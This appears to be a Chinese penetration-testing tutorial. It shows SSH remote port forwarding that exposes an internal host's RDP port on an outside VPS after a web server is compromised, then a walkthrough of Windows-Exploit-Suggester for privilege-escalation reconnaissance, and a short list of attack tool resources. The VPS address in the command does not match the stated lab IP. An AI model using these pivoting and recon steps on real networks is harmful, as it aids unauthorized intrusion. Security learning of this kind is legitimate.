ssh远程端口转发&&windows系统提权之信息收集&&网安工具分享(部分)
阅读原文时间:2023年07月09日阅读:2

一、ssh远程端口转发

背景:当我们在渗透过程中,获取到内网的一台仅有内网IP的服务器后,我们可以通过ssh隧道,将内网某个主机的端口进行远程转发

1.网络拓扑图

假设获取的服务器为web服务器,web服务器将远程内网目标服务器的3389端口,通过ssh远程端口转发给VPS的3307端口,然后在VPS上访问自己本地地址和3307,即可远程到内网的主机

2.实验环境

VPS:192.168.4.134

web服务器:1.1.1.11

数据库服务器:1.1.1.12

3.实验步骤

在web服务器上执行

ssh -R 3307:1.1.1.12:3389: root@192.168.4.136

在VPS上执行

rdesktop 127.0.0.1:3307

二、windows系统提权之信息收集

下载地址
    https://github.com/AonCyberLabs/Windows-Exploit-Suggester
1、安装xlrd包(注意python2、3版本的pip问题)
        使用python2 的pip来安装xlrd包
        命令:python2 -m pip install xlrd==1.2.0

注意:
            安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。所以pandas.read_excel(‘xxx.xlsx’)会报错。
2、获取对应的漏洞信息库(注意要使用python2来获取)
        命令:python2 windows-exploit-suggester.py --update

        成功后会生成一个xls表格文件

3、生成要进行对比的靶机的系统信息
        命令:systeminfo > systeminfo_win10.txt #在对应的靶机上运行该命令

4、使用windows-exploit-suggester.py来进行对比

命令:python2 windows-exploit-suggester.py --database 2021-01-13-mssb.xls --systeminfo systeminfo_win10.txt

三、资料分享:

平日里学习收藏的一些“武器”,分享一下,仅供网络安全学习交流,切勿用于非法测试,否则后果自负:

在线靶场

文件上传漏洞靶场

导航

  • 渗透导航网站:渗透师导航、黑客街

payload

自动爬虫实现的子域名收集工具